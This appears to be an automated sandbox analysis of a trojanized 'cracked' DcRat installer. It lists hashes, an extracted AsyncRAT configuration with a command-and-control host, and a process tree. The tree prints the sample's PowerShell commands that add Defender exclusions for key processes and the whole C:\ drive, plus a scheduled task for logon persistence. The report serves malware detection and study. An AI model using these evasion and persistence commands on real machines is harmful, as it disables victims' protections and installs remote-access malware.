Analysis

  • max time kernel
    80s
  • max time network
    87s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2023 19:12

General

  • Target

    Dc Rat Cracked+Activated_install.exe

  • Size

    12.1MB

  • MD5

    f00412c3ee8f146d7558348e910deed9

  • SHA1

    d5d51ac94ea123cfdd57def46b81562ea98c4cff

  • SHA256

    70825ba5a90d571a78e8acae635d5dd2b8c6cd2703598adb94f99db55f3c696a

  • SHA512

    ac6f52e43bdb26a2a43b266d9aa8f0340ba3eca37a74b484208dc1c6f582c0ee1bab68df570b3d57b046111335dc02ac7c91f26ac963c2dd3dbd71cbb8d64608

  • SSDEEP

    196608:VgTatkAKz1y4UgLLPcaJlscK/Vze5E5Dv6+QP8IlJh+xnem2BTeFjab5lhdI1z:VGb1yzCLEaJp2IEZv6+Ah+xnq4Gb5lI

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

verynice.ddns.net:8848

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    true

  • install_file

    WindowsDefender.exe

  • install_folder

    %Temp%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 5 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dc Rat Cracked+Activated_install.exe
    "C:\Users\Admin\AppData\Local\Temp\Dc Rat Cracked+Activated_install.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1508
    • C:\Users\Admin\AppData\Local\Temp\Stub64bit.exe
      "C:\Users\Admin\AppData\Local\Temp\Stub64bit.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F71.tmp\9FD0.tmp\9FD1.bat C:\Users\Admin\AppData\Local\Temp\Stub64bit.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 14
          4⤵
          • Delays execution with timeout.exe
          PID:852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "Stub32bit.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "Stub64bit.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "cmd.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "conhost.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "timeout.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 30
          4⤵
          • Delays execution with timeout.exe
          PID:1832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "powershell.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionPath "C:\StartUp"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "WindowsDefender.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4192
    • C:\Users\Admin\AppData\Local\Temp\Stub32bit.exe
      "C:\Users\Admin\AppData\Local\Temp\Stub32bit.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3892
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9FCF.tmp\9FD0.tmp\9FD1.bat C:\Users\Admin\AppData\Local\Temp\Stub32bit.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4248
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 14
          4⤵
          • Delays execution with timeout.exe
          PID:1876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "Stub32bit.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "Stub64bit.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "cmd.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "conhost.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3420
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "timeout.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:448
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 30
          4⤵
          • Delays execution with timeout.exe
          PID:3744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "powershell.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionPath "C:\StartUp"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionProcess "WindowsDefender.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3460
    • C:\Users\Admin\AppData\Local\Temp\Stub.exe
      "C:\Users\Admin\AppData\Local\Temp\Stub.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsDefender" /tr '"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "WindowsDefender" /tr '"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAB0A.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:1808
        • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
          "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:928

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    ef72c47dbfaae0b9b0d09f22ad4afe20

    SHA1

    5357f66ba69b89440b99d4273b74221670129338

    SHA256

    692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

    SHA512

    7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    ef72c47dbfaae0b9b0d09f22ad4afe20

    SHA1

    5357f66ba69b89440b99d4273b74221670129338

    SHA256

    692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

    SHA512

    7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    a1008cfb29cdc25b4180c736ec404335

    SHA1

    39760fbcc8c1a64e856e98d61ce194d39b727438

    SHA256

    0eb4209b0f8c0dce02580b4d3ec5692d33be08b1a61858aad0413116afc95558

    SHA512

    00c2cde1601217c28fd71c2daefb21c7fcfeeee7e6badcd1b7f353f4e6df7817f5c4665148a1468b10ea31547642b999e3db5914d6e5f0cb1123243fd9ef213f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    a1008cfb29cdc25b4180c736ec404335

    SHA1

    39760fbcc8c1a64e856e98d61ce194d39b727438

    SHA256

    0eb4209b0f8c0dce02580b4d3ec5692d33be08b1a61858aad0413116afc95558

    SHA512

    00c2cde1601217c28fd71c2daefb21c7fcfeeee7e6badcd1b7f353f4e6df7817f5c4665148a1468b10ea31547642b999e3db5914d6e5f0cb1123243fd9ef213f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    31fddc7cde1ce8268ce05b11ce49a233

    SHA1

    459e413dfa080a413420e7bda8563e018f2190be

    SHA256

    96c9c7049bbeda8fcddb9a3b13e1a8dbc0efef0be1893a46d6f6ab977c617614

    SHA512

    abefdb3d324848a90063afc8c2e8c2d11dcfd477c17ee7833d56f45053edf04fe898e8125eb63162369608683bc76db3b010694e0a284608540a30459a52e935

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    31fddc7cde1ce8268ce05b11ce49a233

    SHA1

    459e413dfa080a413420e7bda8563e018f2190be

    SHA256

    96c9c7049bbeda8fcddb9a3b13e1a8dbc0efef0be1893a46d6f6ab977c617614

    SHA512

    abefdb3d324848a90063afc8c2e8c2d11dcfd477c17ee7833d56f45053edf04fe898e8125eb63162369608683bc76db3b010694e0a284608540a30459a52e935

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    5cfe303e798d1cc6c1dab341e7265c15

    SHA1

    cd2834e05191a24e28a100f3f8114d5a7708dc7c

    SHA256

    c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

    SHA512

    ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    0093819c829dd30c13746f256efba97f

    SHA1

    f095cbb1d10a54a91d7d341c4098d44973d3ec50

    SHA256

    5f936c252c9ed7d08d4a73b86230d9877173b44c36544f0b24eae3eb38617401

    SHA512

    72aac852de41473494d2263aa44dbabfb1f318f8a21ebdfe080c4a98b9288db07e9641a935d9a640b5e879f28a0560cae53bd4191ac94d315b87746e57e69af2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    9512d7fc6bd7fd6f9a322fa248957468

    SHA1

    850ce09fca7a17159c8b8ad5b2002a61ed392c3d

    SHA256

    40c6527c0a447fb33683b5577fa1c0cd6e8be07e78ff57083f6f3339519dddd7

    SHA512

    5c402ac4544931469549a353d22b96ef5157d6b4dd5e71c1e93bb7f5a2ac6197eb13dc29162cfb70cbcfd814527c604b08fd02b42c5d64ad00391dd73f10c4de

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    dd1d0b083fedf44b482a028fb70b96e8

    SHA1

    dc9c027937c9f6d52268a1504cbae42a39c8d36a

    SHA256

    cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

    SHA512

    96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    dd1d0b083fedf44b482a028fb70b96e8

    SHA1

    dc9c027937c9f6d52268a1504cbae42a39c8d36a

    SHA256

    cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

    SHA512

    96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    26403455115fbc3da2573a37cc28744a

    SHA1

    6a9bf407036a8b9d36313462c0257f53b4ee9170

    SHA256

    222a7adb94c5e82df6466a4afce283e905c69f7feb18b3e34583b5cbbd88b352

    SHA512

    be96d478e5d804b8daf805ad28d5eba644fb63a59a799273e029c8047a036f8aac74098efcadee0e4f405dcd1c0a689a1e8eb23f51a93634ed44f5a7c821beb6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    9c740b7699e2363ac4ecdf496520ca35

    SHA1

    aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

    SHA256

    be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

    SHA512

    8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    9c740b7699e2363ac4ecdf496520ca35

    SHA1

    aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

    SHA256

    be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

    SHA512

    8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    9d20bed748fbb656980b0328d7b74728

    SHA1

    5fc8910c493356c0968a86452cb7952917b954b4

    SHA256

    172fe07653a93456e66d5b90333de53e23a561cf982a1a9d96c3459339009069

    SHA512

    eb1f0ca1042371a0d324ba520a9c4159fe91d34cf1851d829b1bf874b92f69fd08c540558d03f9a8c3286926c3c12d89ef9a70ac649c053a02f26922918054f1

  • C:\Users\Admin\AppData\Local\Temp\9F71.tmp\9FD0.tmp\9FD1.bat
    Filesize

    700B

    MD5

    e3ee00ffb5228abb3856494c762b13ed

    SHA1

    3f90af1c02acc217632a6590ee140f2466c333f0

    SHA256

    b113024aa839f033f3f04e34d3265261de4194099ebd0a5a373532f529a20381

    SHA512

    19c62a4ad616da0903e2afe054911a0b28700f686297fc7ab61a2d08143d85da927b6887767c6ea3aeb02202e57676d50b5f1eae92db50c03f757f5ccce5cc20

  • C:\Users\Admin\AppData\Local\Temp\9FCF.tmp\9FD0.tmp\9FD1.bat
    Filesize

    700B

    MD5

    e3ee00ffb5228abb3856494c762b13ed

    SHA1

    3f90af1c02acc217632a6590ee140f2466c333f0

    SHA256

    b113024aa839f033f3f04e34d3265261de4194099ebd0a5a373532f529a20381

    SHA512

    19c62a4ad616da0903e2afe054911a0b28700f686297fc7ab61a2d08143d85da927b6887767c6ea3aeb02202e57676d50b5f1eae92db50c03f757f5ccce5cc20

  • C:\Users\Admin\AppData\Local\Temp\Stub.exe
    Filesize

    63KB

    MD5

    1a76515d1722564375589437a45eba34

    SHA1

    6046e4ecda7cbf012205878fa0ca39902e17cd52

    SHA256

    e0556c4f5cd6277ea078e58833224683b08242f0fda81cff8055ac45e8517c8f

    SHA512

    c34c4e7d9b73ed3a25606f454d8f327f53ba2fff4ddc3e26208d8072b16a6d46deaef99a3f511ea68d09a197b57e2166122421e1ea4f412d49d6fd03e2277081

  • C:\Users\Admin\AppData\Local\Temp\Stub.exe
    Filesize

    63KB

    MD5

    1a76515d1722564375589437a45eba34

    SHA1

    6046e4ecda7cbf012205878fa0ca39902e17cd52

    SHA256

    e0556c4f5cd6277ea078e58833224683b08242f0fda81cff8055ac45e8517c8f

    SHA512

    c34c4e7d9b73ed3a25606f454d8f327f53ba2fff4ddc3e26208d8072b16a6d46deaef99a3f511ea68d09a197b57e2166122421e1ea4f412d49d6fd03e2277081

  • C:\Users\Admin\AppData\Local\Temp\Stub32bit.exe
    Filesize

    87KB

    MD5

    ba26aa730afb99c60ac88b00b8787708

    SHA1

    25249586e68bfff71a66325acd4586043057e424

    SHA256

    51586a19cfb7fc77ed4ec20d1b63e28e484100aabf8cd49f5c59671c2713cc28

    SHA512

    c83b144c2a013cf1464c700a7e66a0371f481937a4150b996b10724474191d31f5ee105d7b847be5d1d7592e17dd6a6be968a4f4a33ed440ab60e27da7197074

  • C:\Users\Admin\AppData\Local\Temp\Stub32bit.exe
    Filesize

    87KB

    MD5

    ba26aa730afb99c60ac88b00b8787708

    SHA1

    25249586e68bfff71a66325acd4586043057e424

    SHA256

    51586a19cfb7fc77ed4ec20d1b63e28e484100aabf8cd49f5c59671c2713cc28

    SHA512

    c83b144c2a013cf1464c700a7e66a0371f481937a4150b996b10724474191d31f5ee105d7b847be5d1d7592e17dd6a6be968a4f4a33ed440ab60e27da7197074

  • C:\Users\Admin\AppData\Local\Temp\Stub64bit.exe
    Filesize

    120KB

    MD5

    21e40d4449b30dfccafc75c935dbf5e2

    SHA1

    0de44bda02aefd9bbbbf3353d381c8e17443dfcb

    SHA256

    98e6a69ccb6fc25b3c757e493bdcbc4f6c5b40af92ea8bdee684e0661c0ba014

    SHA512

    22bc8e268d0ed1936e792fd66338bcfbed9633bf80d89fcd31f4132a7605080a9a6123d90e796b1f4b53d376987a4eddb6c316259e2af05b72825f6cbe78cd59

  • C:\Users\Admin\AppData\Local\Temp\Stub64bit.exe
    Filesize

    120KB

    MD5

    21e40d4449b30dfccafc75c935dbf5e2

    SHA1

    0de44bda02aefd9bbbbf3353d381c8e17443dfcb

    SHA256

    98e6a69ccb6fc25b3c757e493bdcbc4f6c5b40af92ea8bdee684e0661c0ba014

    SHA512

    22bc8e268d0ed1936e792fd66338bcfbed9633bf80d89fcd31f4132a7605080a9a6123d90e796b1f4b53d376987a4eddb6c316259e2af05b72825f6cbe78cd59

  • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
    Filesize

    63KB

    MD5

    1a76515d1722564375589437a45eba34

    SHA1

    6046e4ecda7cbf012205878fa0ca39902e17cd52

    SHA256

    e0556c4f5cd6277ea078e58833224683b08242f0fda81cff8055ac45e8517c8f

    SHA512

    c34c4e7d9b73ed3a25606f454d8f327f53ba2fff4ddc3e26208d8072b16a6d46deaef99a3f511ea68d09a197b57e2166122421e1ea4f412d49d6fd03e2277081

  • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
    Filesize

    63KB

    MD5

    1a76515d1722564375589437a45eba34

    SHA1

    6046e4ecda7cbf012205878fa0ca39902e17cd52

    SHA256

    e0556c4f5cd6277ea078e58833224683b08242f0fda81cff8055ac45e8517c8f

    SHA512

    c34c4e7d9b73ed3a25606f454d8f327f53ba2fff4ddc3e26208d8072b16a6d46deaef99a3f511ea68d09a197b57e2166122421e1ea4f412d49d6fd03e2277081

  • C:\Users\Admin\AppData\Local\Temp\tmpAB0A.tmp.bat
    Filesize

    162B

    MD5

    a579754eb8a4bb421c5c139115838f81

    SHA1

    7a639dc21095ac03257bb3ae9b19d0ac0e18c60b

    SHA256

    7d93e5e2624cf85770d8e3fd7594c14071067743c56fb0126f7a874a244ee09f

    SHA512

    9ba8b0dff85baccc47a86d247920b311dc870e1f0a09ea79816c13fa77b069eca152f53454259a97cc53c06afa6d627a9ffd999b6682e26be11a1a1682faf30a

  • memory/448-186-0x0000000000000000-mapping.dmp
  • memory/448-190-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/448-193-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/564-132-0x0000000000000000-mapping.dmp
  • memory/852-147-0x0000000000000000-mapping.dmp
  • memory/928-179-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/928-155-0x0000000000000000-mapping.dmp
  • memory/928-158-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/956-150-0x0000000000000000-mapping.dmp
  • memory/1296-209-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1296-203-0x0000000000000000-mapping.dmp
  • memory/1296-206-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1716-208-0x0000000000000000-mapping.dmp
  • memory/1716-212-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1716-214-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1808-152-0x0000000000000000-mapping.dmp
  • memory/1832-197-0x0000000000000000-mapping.dmp
  • memory/1876-146-0x0000000000000000-mapping.dmp
  • memory/2040-141-0x0000000000760000-0x0000000000776000-memory.dmp
    Filesize

    88KB

  • memory/2040-148-0x00007FF81B640000-0x00007FF81C101000-memory.dmp
    Filesize

    10.8MB

  • memory/2040-138-0x0000000000000000-mapping.dmp
  • memory/2040-153-0x00007FF81B640000-0x00007FF81C101000-memory.dmp
    Filesize

    10.8MB

  • memory/2108-215-0x0000000000000000-mapping.dmp
  • memory/2108-219-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2152-143-0x0000000000000000-mapping.dmp
  • memory/2440-201-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2440-198-0x0000000000000000-mapping.dmp
  • memory/2928-180-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2928-173-0x0000000000000000-mapping.dmp
  • memory/2940-160-0x0000000000000000-mapping.dmp
  • memory/2940-162-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2968-167-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2968-171-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2968-163-0x0000000000000000-mapping.dmp
  • memory/3420-185-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3420-181-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3420-177-0x0000000000000000-mapping.dmp
  • memory/3436-154-0x0000000000000000-mapping.dmp
  • memory/3440-199-0x0000000000000000-mapping.dmp
  • memory/3440-202-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3440-205-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3460-221-0x0000000000000000-mapping.dmp
  • memory/3460-224-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3620-172-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3620-168-0x0000000000000000-mapping.dmp
  • memory/3704-176-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/3704-174-0x0000000000000000-mapping.dmp
  • memory/3744-195-0x0000000000000000-mapping.dmp
  • memory/3892-135-0x0000000000000000-mapping.dmp
  • memory/4192-225-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4192-220-0x0000000000000000-mapping.dmp
  • memory/4248-142-0x0000000000000000-mapping.dmp
  • memory/4276-188-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4276-183-0x0000000000000000-mapping.dmp
  • memory/4276-184-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4480-149-0x0000000000000000-mapping.dmp
  • memory/4784-191-0x0000000000000000-mapping.dmp
  • memory/4784-196-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4784-194-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4876-166-0x00007FF81B5E0000-0x00007FF81C0A1000-memory.dmp
    Filesize

    10.8MB

  • memory/4876-161-0x000001A998110000-0x000001A998132000-memory.dmp
    Filesize

    136KB

  • memory/4876-159-0x0000000000000000-mapping.dmp
